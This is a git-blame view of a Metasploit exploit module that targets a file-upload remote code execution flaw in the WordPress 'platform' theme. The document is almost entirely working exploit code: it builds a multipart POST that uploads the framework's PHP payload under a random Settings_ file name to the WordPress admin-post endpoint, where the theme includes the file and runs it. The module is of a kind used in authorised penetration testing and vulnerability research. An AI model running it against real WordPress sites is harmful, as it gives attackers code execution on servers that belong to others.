Files
metasploit-gs/modules/exploits/unix/webapp/wp_platform_exec.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

57 lines
1.9 KiB
Ruby
Raw Normal View History

2015-01-31 22:02:44 +01:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2015-01-31 22:02:44 +01:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2015-01-31 22:02:44 +01:00
Rank = ExcellentRanking
2015-10-15 11:47:13 -05:00
include Msf::Exploit::Remote::HTTP::Wordpress
2015-01-31 22:02:44 +01:00
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress Platform Theme File Upload Vulnerability',
2015-01-31 22:02:44 +01:00
'Description' => %q{
The WordPress Theme "platform" contains a remote code execution vulnerability
2015-02-03 17:33:29 -06:00
through an unchecked admin_init call. The theme includes the uploaded file
2017-09-07 21:18:50 -04:00
from its temp filename with php's include function.
2015-01-31 22:02:44 +01:00
},
'Author' =>
[
'Marc-Alexandre Montpas', # initial discovery
'Christian Mehlmauer' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],
['WPVDB', '7762']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['platform < 1.4.4, platform pro < 1.6.2', {}]],
'DefaultTarget' => 0,
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2015-01-21'))
2015-01-31 22:02:44 +01:00
end
def exploit
filename = "Settings_#{rand_text_alpha(5)}.php"
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
data.add_part('settings', nil, nil, 'form-data; name="settings_upload"')
data.add_part('pagelines', nil, nil, 'form-data; name="page"')
post_data = data.to_s
2016-02-01 15:12:03 -06:00
print_status("Uploading payload")
2015-02-03 17:33:29 -06:00
send_request_cgi({
2015-01-31 22:02:44 +01:00
'method' => 'POST',
'uri' => wordpress_url_admin_post,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
2015-02-03 17:33:29 -06:00
}, 5)
2015-01-31 22:02:44 +01:00
end
end